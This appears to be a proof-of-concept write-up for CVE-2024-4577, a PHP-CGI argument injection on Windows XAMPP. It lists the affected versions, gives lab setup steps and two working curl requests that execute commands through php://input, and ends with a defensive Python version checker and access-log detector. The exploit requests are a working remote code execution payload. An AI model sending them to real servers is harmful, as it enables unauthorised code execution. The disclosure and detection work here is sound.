CVE-2024-4577
CVE-2024-4577 is a PHP-CGI argument injection vulnerability discovered by DEVCORE. The vulnerability has been verified on Windows machines running in the following system locales:
- Traditional Chinese (Code Page 950)
- Simplified Chinese (Code Page 936)
- Japanese (Code Page 932)
All versions of XAMPP on Windows are vulnerable by default. The following PHP versions are affected on Windows:
- PHP 8.3 < 8.3.8
- PHP 8.2 < 8.2.20
- PHP 8.1 < 8.1.29
How to set up your own PoC environment
- On your Windows machine, download and install XAMPP.
- Download mod_fcgid.so and place it in C:\xampp\apache\modules
- Verify that the block below is not commented out in C:\xampp\apache\conf\extra\httpd-xampp.conf
#
# PHP-CGI setup
#
<FilesMatch "\.php$">
SetHandler application/x-httpd-php-cgi
</FilesMatch>
<IfModule actions_module>
Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"
</IfModule>
- Start Apache / PHP from the XAMPP Control Panel and verify that CGI/FastCGI is running.
- Change the system locale to one of the three locales listed above and reboot the host. This does not change the Windows display language.
  - Control Panel > Clock and Region > Region > Administrative > Change system locale...
- Once rebooted, start the web server again and attack the target from any host.
curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c \"whoami\"'); ?>"
curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c \"dir\"'); ?>"
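The following is an added defender-side example, not part of this PoC or of DEVCORE's research. It does two things a responder would want after reading the version list and the request above: it classifies a Windows PHP version against the fixed releases listed on this page, and it scans Apache combined-format access log lines for the request shape shown above, where a percent-encoded soft hyphen (%AD) directly precedes a php-cgi option letter, or where the decoded query sets the ini directives the request uses. The log lines are constructed for the example; the `\xad` form assumes Apache's default escaping of raw high bytes in the request line.

```python
import re
from urllib.parse import unquote_plus

# Fix thresholds taken from the affected-version list on this page (Windows builds).
FIXED_IN = {(8, 3): (8, 3, 8), (8, 2): (8, 2, 20), (8, 1): (8, 1, 29)}


def parse_version(text):
    """'8.3.7' -> (8, 3, 7); tolerates suffixes such as '8.3.7RC1'."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised PHP version: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(version):
    """True/False for the 8.1/8.2/8.3 branches listed on the page; None for any other branch."""
    v = parse_version(version)
    fixed = FIXED_IN.get(v[:2])
    if fixed is None:
        return None
    return v < fixed


# Request line inside an Apache combined-format access log entry.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# %AD is the soft hyphen, which best-fit mapping on the listed code pages turns into '-'.
# Apache logs a raw 0xAD byte as the escape sequence \xad (assumption: default escaping).
SOFT_HYPHEN_OPT = re.compile(r"(?:%ad|\\xad)[a-z]", re.IGNORECASE)

# ini directives that appear in the request shown on this page.
DIRECTIVE_RE = re.compile(r"allow_url_include|auto_prepend_file", re.IGNORECASE)


def suspicious_target(target):
    """Heuristics for the soft-hyphen argument injection in a request target."""
    if "?" not in target:
        return False
    query = target.split("?", 1)[1]
    if SOFT_HYPHEN_OPT.search(query):
        return True
    # latin-1 keeps single high bytes instead of turning them into replacement chars
    decoded = unquote_plus(query, encoding="latin-1")
    return bool(DIRECTIVE_RE.search(decoded))


def scan_log(lines):
    """Return (line_no, client_ip, target) for every log line whose request looks suspicious."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if m and suspicious_target(m.group("target")):
            hits.append((n, line.split(" ", 1)[0], m.group("target")))
    return hits


# Constructed sample log: one benign request, the PoC request shape, two benign non-ASCII queries.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jun/2024:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
10.0.0.9 - - [06/Jun/2024:10:00:07 +0000] "POST /index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 77
10.0.0.7 - - [06/Jun/2024:10:00:12 +0000] "GET /about.php?q=caf%C3%A9 HTTP/1.1" 200 1024
10.0.0.8 - - [06/Jun/2024:10:00:15 +0000] "GET /search.php?q=%AD%20x HTTP/1.1" 200 300
""".splitlines()


if __name__ == "__main__":
    for ver in ("8.3.7", "8.3.8", "8.1.28", "7.4.33"):
        print(ver, "affected:", is_affected(ver))
    for line_no, ip, target in scan_log(SAMPLE_LOG):
        print(f"line {line_no} from {ip}: {target}")
```

Only the second sample line is reported; the lone `%AD` in the fourth line is not followed by an option letter and sets no directive, so it is left alone. Run the scan over a real access log with `scan_log(open(path, encoding="latin-1"))`.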